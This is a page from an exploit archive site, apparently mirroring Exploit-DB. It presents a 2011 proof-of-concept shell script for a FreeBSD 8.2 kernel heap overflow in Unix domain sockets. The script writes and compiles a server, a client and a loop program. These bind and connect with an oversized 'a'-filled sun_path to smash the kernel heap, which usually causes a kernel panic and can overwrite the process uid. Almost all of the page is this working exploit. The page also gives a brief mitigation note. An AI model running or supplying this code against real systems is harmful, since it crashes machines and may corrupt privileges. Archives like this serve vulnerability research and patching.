Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
fbsd-uipcsock-heap.sh - exploit.company
header-logo
Suggest Exploit
vendor:
FreeBSD
by:
Shaun Colley
7.5
CVSS
HIGH
Heap Overflow
122
CWE
Product Name: FreeBSD
Affected Version From: FreeBSD 8.2-RELEASE
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: FreeBSD
2011

fbsd-uipcsock-heap.sh

Proof-of-concept crash for the FreeBSD Unix domain sockets heap overflow. This was tested on FreeBSD 8.2-RELEASE. This PoC will usually result in a kernel panic with a read access violation at 0x616161XX but sometimes the kernel will not crash straight away (particularly if you shorten the length of 'sun_path' -- try 140 bytes), and your uid (see output of `id`) may have been modified to the decimal equivalent of 0x61616161 during the heap smash.

Mitigation:

Apply the patches provided in the advisory.
Source

Exploit-DB raw data:

#!/bin/sh
#
# fbsd-uipcsock-heap.sh, by Shaun Colley <scolley@ioactive.com>, 29/09/11
#
# proof-of-concept crash for the freebsd unix domain sockets heap
# overflow.  this was tested on freebsd 8.2-RELEASE.  just a PoC for now.
#
# see advisory & patches for details:
# http://www.securityfocus.com/archive/1/519864/30/0/threaded
#
# this PoC will usually result in a kernel panic with a read access
# violation at 0x616161XX but sometimes the kernel will not crash straight
# away (particularly if you shorten the length of 'sun_path' -- try 140 bytes),
# and your uid (see output of `id`) may have been modified to the
# decimal equivalent of 0x61616161 during the heap smash 

# write server code to srv.c 
cat > srv.c << _EOF
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/types.h>
#include <unistd.h>
#include <string.h>

struct socky {
  short sun_family;
  char sun_path[160];
};

int connhandler(int incoming) 
{
  char buffer[256];
  int n = 0;

  n = read(incoming, buffer, 256);
  buffer[n] = 0;

  printf("%s\n", buffer);
  n = sprintf(buffer, "fbsd uipc socket heap overflow");
  write(incoming, buffer, n);
 
  close(incoming);
  return 0;
}

int main(void)
{
  struct socky overfl0w;
  int sock, incoming; 
  socklen_t alen;
  pid_t child;
  char buf[160];
 
  sock = socket(PF_UNIX, SOCK_STREAM, 0);
  if(sock < 0)
    {
      printf("socket() failed!\n");
      return 1;
    } 

  memset(&overfl0w, 0, sizeof(struct socky));

  overfl0w.sun_family = AF_UNIX;
  memset(buf, 0x61, sizeof(buf));
  buf[sizeof(buf)-1] = 0x00;
  strcpy(overfl0w.sun_path, buf);

  if(bind(sock, (struct sockaddr *)&overfl0w, 
	  sizeof(struct socky)) != 0)
    {
      printf("bind() failed!\n");
      return 1;
    }

  if(listen(sock, 5) != 0)
    {
      printf("listen() failed!\n");
      return 1;
    }

  while((incoming = accept(sock, (struct sockaddr *)&overfl0w, &alen)) > -1) 
    {
      child = fork();
      if(child == 0)
	{
	  return connhandler(incoming);
	}
      close(incoming);
    }

  close(sock);
  return 0;
}
_EOF

gcc srv.c -o srv

# write the client code to client.c
cat > client.c << _EOF
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <string.h>

struct socky {
  short sun_family;
  char sun_path[160];
};

int main(void)
{
  struct socky overfl0w;
  int  sock, n;
  char buffer[256], buf[160];

  sock = socket(PF_UNIX, SOCK_STREAM, 0);
  if(sock < 0)
    {
      printf("socket() failed!\n");
      return 1;
    }

  /* start with a clean address structure */
  memset(&overfl0w, 0, sizeof(struct sockaddr_un));
 
  overfl0w.sun_family = AF_UNIX;
  memset(buf, 0x61, sizeof(buf));
  buf[sizeof(buf)-1] = 0x00;
  strcpy(overfl0w.sun_path, buf);

  if(connect(sock, 
	     (struct sockaddr *)&overfl0w, 
	     sizeof(struct socky)) != 0)
    {
      printf("connect() failed!\n");
      return 1;
    }

  n = snprintf(buffer, 256, "panic");
  write(sock, buffer, n);
 
  n = read(sock, buffer, 256);
  buffer[n] = 0;

  printf("%s\n", buffer);

  close(sock);
  return 0;
}
_EOF

gcc client.c -o client

# crash doesn't happen straight away, so loop the client to speed it up
cat > loop.c << _EOF
#include <stdio.h>

int main() {
int i;
for(i = 0; i < 1000; i++) {
system("./client");
}
}
_EOF

gcc loop.c -o loop

./srv &
./loop

Navigation

Suggest Exploit

Services By CQR